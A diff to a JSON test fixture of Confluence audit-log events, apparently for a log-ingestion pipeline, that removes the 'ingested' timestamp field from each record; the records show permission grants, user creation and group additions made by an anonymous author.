@@ -1179,7 +1166,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:47:21.347849913Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATESPACE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":696000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -1278,7 +1264,6 @@ }, "event": { "action": "audit.logging.summary.user.created", - "ingested": "2021-12-24T00:47:21.347850684Z", "original": "{\"affectedObjects\":[{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User created\",\"actionI18nKey\":\"audit.logging.summary.user.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Display name\",\"key\":\"Display name\",\"to\":\"test.user\"},{\"i18nKey\":\"Email\",\"key\":\"Email\",\"to\":\"test.user@example.com\"},{\"i18nKey\":\"Username\",\"key\":\"Username\",\"to\":\"admin\"},{\"i18nKey\":\"Active\",\"key\":\"Active\",\"to\":\"Yes\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":54000000},\"version\":\"1.0\"}", "type": [ "user", 
@@ -1368,7 +1353,6 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-24T00:47:21.347851381Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"admin\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":147000000},\"version\":\"1.0\"}", "type": [ "group", @@ -1457,7 +1441,6 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-24T00:47:21.347852169Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"admin\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":172000000},\"version\":\"1.0\"}", "type": [ "group", 
@@ -1560,7 +1543,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347852874Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"VIEWSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":401000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -1656,7 +1638,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347853569Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"VIEWSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":429000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -1746,7 +1727,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347854260Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"VIEWSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":437000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -1842,7 +1822,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347855023Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":442000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -1938,7 +1917,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347855730Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":445000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -2028,7 +2006,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347856421Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":447000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -2124,7 +2101,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347857217Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"COMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":450000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -2220,7 +2196,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347857918Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"COMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":454000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -2310,7 +2285,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347858688Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"COMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":457000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -2406,7 +2380,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347859403Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":459000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -2502,7 +2475,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347860107Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":462000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -2592,7 +2564,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347874942Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":464000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -2688,7 +2659,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347875698Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"SETSPACEPERMISSIONS\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":467000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -2784,7 +2754,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347876477Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEPAGE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":470000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -2880,7 +2849,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347877211Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEPAGE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":472000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -2970,7 +2938,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347877921Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEPAGE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":475000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -3066,7 +3033,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347878636Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVECOMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":479000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -3162,7 +3128,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347879456Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVECOMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":481000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -3252,7 +3217,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347880173Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVECOMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":484000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -3348,7 +3312,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347880897Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":486000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -3444,7 +3407,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347881608Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":489000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -3534,7 +3496,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347882343Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":491000000},\"version\":\"1.0\"}", "type": [ "admin", 
